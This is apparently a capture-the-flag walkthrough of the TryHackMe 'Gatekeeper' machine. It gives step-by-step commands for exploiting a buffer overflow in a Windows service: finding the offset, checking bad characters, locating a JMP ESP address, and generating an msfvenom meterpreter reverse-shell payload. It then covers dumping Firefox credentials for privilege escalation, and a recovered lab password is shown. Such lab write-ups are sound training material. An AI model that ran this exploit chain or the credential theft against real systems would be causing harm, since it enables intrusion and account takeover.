Tryhackme Gatekeeper Walkthrough
Hi guys my name is Ahmed and my nickname is SadC0d3r
To day i will solve Gatekeeper machine
Difficulty: Medium
OS : Windows
let’s start the machine and take the ip
First step i will namp the target
target ip = 10.10.135.141
nmap -A -sV 10.10.135.141
in this command i use option -A to get some information about the OS (operating system) of the machine and -sV option to get the version of service running maybe version of service is vulnerable
Ok let’s read the nmap result
i found port 31337 is open it caught my attention and tried to connect the port by nc (netcat) by this command nc 10.10.135.141 31337
i doesn’t get any thing then i wrote any word
when i wrote the sad it reflected in new line
Ok let’s try Reflect XSS in my terminal
Sorry i kidding 🤣🤣🤣
i tried enter big number and i see what the program will do
great the connection is closed that is meaning the program in the server has been crashed
the next step get the binary version of this program i make some of directory brute forcing but this machine has not web page to do that
but wait i found smb is opened in this machine when i saw the nmap result then let’s try to connect the smb by smbclient by this command
smbclient -L //10.10.142.181
i found ADMIN$ … etc i tried connect with ADMIN$ but i can’t then i tried Users
Done ! … i can connect and execute some f command i found 3 dirs
i will go to Share dir
yes i found exe file i will download it by this command get gatekeeper.exe
and i will open my windows machine and run Immunity Debugger as administrator
and open the exe file from here
and press F9 twice to run the program
and get my ip for windows machine by this command in cmd ipconfig
let’s confirm the program it is the same run in the server by try to connect in the same port
Good it is the same program lets start to testing Buffer overflow
First all tools or scripts here in this link
ok lets do fuzzing to identify when the program will crash
put big input in the program in put like i do previously
ok the first thing in Bof (Buffer overflow) testing get the offset to know when the buffer will overflow
then i will generate the pattern 1000 byte by this command
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 1000
open the exploit script and put our windows machine in ip variable and port 31337 in port variable and the pattern in payload variable
then run the exploit script and go to immunity debugger you will see the program has been crashed
then copy the EIP address and go to terminal again to calculate the offset
by this command
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 1000 -q 39654138
in option -l i put the byte size i generated and in -q option i i put the Eip address
Good i get the offset then go to exploit script again and change the offset variable from 0 to 146
and confirm the overwrite by change the padding variable to BBBB and delete any values in payload variable
restart the program in immunity by pressing ctrl + f2 and f9 twice
and run the exploit script again
in normal you will see in EIP register the value is 41414141 this for we send A but now you will see the EIP value is 42424242 because we added the BBBB over the offset
the next step get the bad character (this character make problems during the payload running to lead attack failed to get reverse shell)
i will use mona module then make working dir to mona by this command
!mona config -set workingfolder c:\mona\%p
in immunity i will run this command to generate list of bad chars from {\x01 to \xff} \x00 char it is bad by default
!mona bytearray -b “\x00”
and run this script in your terminal to generate the bad chars
for x in range(1, 256):
print(“\\x” + “{:02x}”.format(x), end=’’)
print()
copy the bad chars list and go to exploit script and put it in payload variable
now restart the program in immunity by pressing ctrl + f2 and f9 twice
then run the exploit script
the program it will crash again ok now i will get the bad chars by tow methods
the first method by go to ESP register and right click and choose follow in dump
you will find all chars we generated but the bad chars you didn’t found it
You should check char by char to find the lost to know this is bad char
but it so hard then lets go to use second method
we will use mona module to find the bad char by this command
!mona compare -f C:\mona\oscp\bytearray.bin -a <ESP>
replace the <ESP> to here value
the final command
!mona compare -f C:\mona\oscp\bytearray.bin -a 02AB19F8
you will get the bad chars is \x00 and \x0a
ok now we will Finding a Jump Point this point haven’t any protection and we will redirect to my shell code
using this command
!mona jmp -r esp -cpb “\x00\x0a”
include all of bad chars
and run it
here you will get tow address choose any one and if you doesn’t see the result go to the working dir you will get file contain the result bigger than this terminal
C:\mona\gatekeeper\jmp.txt
now i will write the address reversely
the address is 0x080414c3 you should write \xc3\x14\x04\x08
and added in retn variable in exploit script
ok now generate the payload to gain the reverse shell
i will use msfvenom
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.6.71.200 LPORT=4444 EXITFUNC=thread -b “\x00\x0a” -f c
i will generate meterpreter reverse shell and you change the LHOST to your kali machine (your attack box) and LPORT to any prefered port i will use 4444 port and -b put the bad chars you found it to extract them and -f to generate in specific language i use C you can use py for python
this is the payload go to the exploit script and put this payload in payload variable and in padding variable put this value “\x90” * 16 to take a space to run our shell code
very good now open the metasploit by this command msfconsole to configure our listener
after the metasploit is opened write this command to use the multi handler
use exploit/multi/handler
now write options to see the multi handler options
this is options
now write this command to set your local ip
set LHOST <YOUR IP>
and use this command to set the type of payload i generate windows/meterpreter/reverse_tcp
set PAYLOAD windows/meterpreter/reverse_tcp
and now write run
now go to exploit script and change the ip variable to the machine ip
and run the exploit script
BooooM
we get the meterpreter shell
this is info about the machine
write ls command and dont care about OS the meterpreter will run correct command
file user.txt.txt the user flag
write cat user.txt.txt
now the party will be start now privilege escalation time
when i run ls command in back screen i found Firefox.lnk
Firefox.lnk this is shortcut icon thats meaning this machine have firefox browser
why not try dump the credential lets try
ok now press ctrl+z in meterpreter shell and choose yes kept it in background
and now use the post/multi/gather/firefox_creds to dump the users credential
use post/multi/gather/firefox_creds
write options
it need number of session you can get the session number by this command
sessions
the session id
now write set SESSION 1 to set the session and then write run
now it dump the info in this path /home/kali/.msf4/loot/
show in your terminal whats the path
now i try to decrypt the info by this tool
but when i tried run this tool it didn’t work then go to Google and make some of search i found we should change the filse name to cert9.db,cookies.sqlite,login.json and key4.db
ok now i will rename all files
now i will run the tool by this command
python3 firefox_decrypt.py ./
Great i found username and password i will try use it to connect the server like rdb by this command
xfreerdp /u:mayor /p:8CL7O1 /cert:ignore /v:10.10.230.43 /workarea
in /u: put the username /p:put the password /v:machine ip
the root flag in file root.txt
and the machine has been pwned
I hope you like the explanation, thank you
Follow me on twitter
Ahmed Rabeaa Mosaa (@AhmedMosaa18) / Twitter
and Linkedin
